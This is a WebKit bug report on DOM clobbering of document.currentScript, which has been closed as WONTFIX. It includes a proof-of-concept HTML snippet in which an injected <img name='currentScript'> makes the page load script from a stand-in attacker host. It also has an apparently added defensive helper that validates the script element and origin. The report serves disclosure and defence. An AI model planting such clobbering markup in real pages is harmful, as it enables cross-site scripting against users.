Bug 281129

Summary: Prevent document.currentScript from being overwritten via a DOM element with name='currentScript'
Product: WebKit
Reporter: jujjyl
Component: DOM
Assignee: Nobody <webkit-unassigned>
Status: RESOLVED WONTFIX
Severity: Enhancement
CC: annevk, ashvayka, mark.lam, rniwa, webkit-bug-importer
Priority: P2
Keywords: InRadar
Version: Other
Hardware: All
OS: All

Description jujjyl 2024-10-09 02:44:13 PDT
There is a relatively common source of CVEs that is being reported, e.g.

- https://vulert.com/vuln-db/CVE-2024-45389
- https://github.com/advisories/GHSA-gcx4-mw62-g8wm
- https://nvd.nist.gov/vuln/detail/CVE-2024-45812
- https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986

based on a "DOM clobbering" technique, where if an attacker can inject a DOM element with a `name='currentScript'` attribute, and the page happens to read `document.currentScript.src` to decide what URL to load a sibling JS file from, then an attacker can elevate their attack threat vector from DOM clobbering to an XSS scripting attack.

I.e.

```html
<html><body>
<!-- injected element: a named <img> shadows document.currentScript -->
<img name='currentScript' src='http://bad.attacker.site.com/foo.js'>
<script>
var script = document.createElement('script');
// document.currentScript is now the <img>, so .src is the attacker's URL
var scriptDir = document.currentScript.src.substr(0, document.currentScript.src.lastIndexOf('/'));
script.src = `${scriptDir}/sibling.js`;
// the load is only issued once the element is in the document
document.body.appendChild(script);
</script></body></html>
```
will undesirably load `http://bad.attacker.site.com/sibling.js` instead of `/sibling.js` from the same server that the HTML site is served at.

This is discussed in the WhatWG/HTML ticket at https://github.com/whatwg/html/issues/10687 where it is asked that browsers would blacklist the special `name="currentScript"` attribute from clobbering `document.currentScript`. A WPT test is added at https://github.com/web-platform-tests/wpt/pull/48536 .

Would Apple agree to enforce this security restriction and +1 the proposal at https://github.com/whatwg/html/issues/10687 ?

(this is a security problem, but not marking it hidden since there are already so many public CVEs that have been reported and the issue has been known since at least 2016)
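As an added illustration (not part of this bug report or of WebKit): a page-side way to derive a sibling URL that refuses a clobbered `document.currentScript`. The helper names `resolveScriptDir` and `siblingUrl`, the `ScriptElement`/`allowedOrigins` parameters and the `Fake*` element classes are assumptions so the code runs outside a browser; in a real page you would pass `document.currentScript`, `HTMLScriptElement` and `[location.origin]`.

```javascript
// Return the directory URL of the script that is currently executing, or throw
// if the value passed in is not a genuine same-origin <script> element.
function resolveScriptDir(candidate, ScriptElement, allowedOrigins) {
  // 1. A clobbered document.currentScript is an <img>/<form>/etc. (or an
  //    HTMLCollection when several elements share the name), never a <script>.
  if (!(candidate instanceof ScriptElement)) {
    throw new Error('document.currentScript is not an HTMLScriptElement (possible DOM clobbering)');
  }
  // 2. Inline scripts have an empty src; there is nothing to derive from.
  const src = candidate.src;
  if (typeof src !== 'string' || src === '') {
    throw new Error('currentScript has no src');
  }
  // 3. Parse as an absolute URL and require an expected origin, so a sibling
  //    load can never be redirected to a host the page does not trust.
  const url = new URL(src);
  if (!allowedOrigins.includes(url.origin)) {
    throw new Error(`refusing to derive sibling path from unexpected origin ${url.origin}`);
  }
  // 4. Strip the file name from the path (ignoring ?query and #fragment).
  const dir = url.pathname.slice(0, url.pathname.lastIndexOf('/') + 1);
  return url.origin + dir;
}

function siblingUrl(candidate, ScriptElement, allowedOrigins, file) {
  return new URL(file, resolveScriptDir(candidate, ScriptElement, allowedOrigins)).href;
}

// Constructed stand-ins for the browser's element classes (not real DOM).
class FakeHTMLElement { constructor(props) { Object.assign(this, props); } }
class FakeHTMLScriptElement extends FakeHTMLElement {}
class FakeHTMLImageElement extends FakeHTMLElement {}

// Constructed scenario mirroring the report: page served from https://example.test
const PAGE_ORIGIN = 'https://example.test';
const genuineScript = new FakeHTMLScriptElement({ src: 'https://example.test/app/main.js?v=3' });
const clobberingImg = new FakeHTMLImageElement({ src: 'http://bad.attacker.site.com/foo.js' });

function demo() {
  const results = {};
  results.genuine = siblingUrl(genuineScript, FakeHTMLScriptElement, [PAGE_ORIGIN], 'sibling.js');
  try {
    siblingUrl(clobberingImg, FakeHTMLScriptElement, [PAGE_ORIGIN], 'sibling.js');
    results.clobbered = 'loaded';
  } catch (e) {
    results.clobbered = e.message;
  }
  return results; // genuine -> https://example.test/app/sibling.js, clobbered -> error text
}
```

The origin check is defence in depth for the case where the element check alone is bypassed; pages that legitimately load scripts from a CDN list that origin in `allowedOrigins`.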
Comment 1 Radar WebKit Bug Importer 2024-10-16 02:45:16 PDT
<rdar://problem/138025273>
Comment 2 Ryosuke Niwa 2024-10-20 14:02:05 PDT
This has been interoperable browser behavior for years, and I don't think we can change that.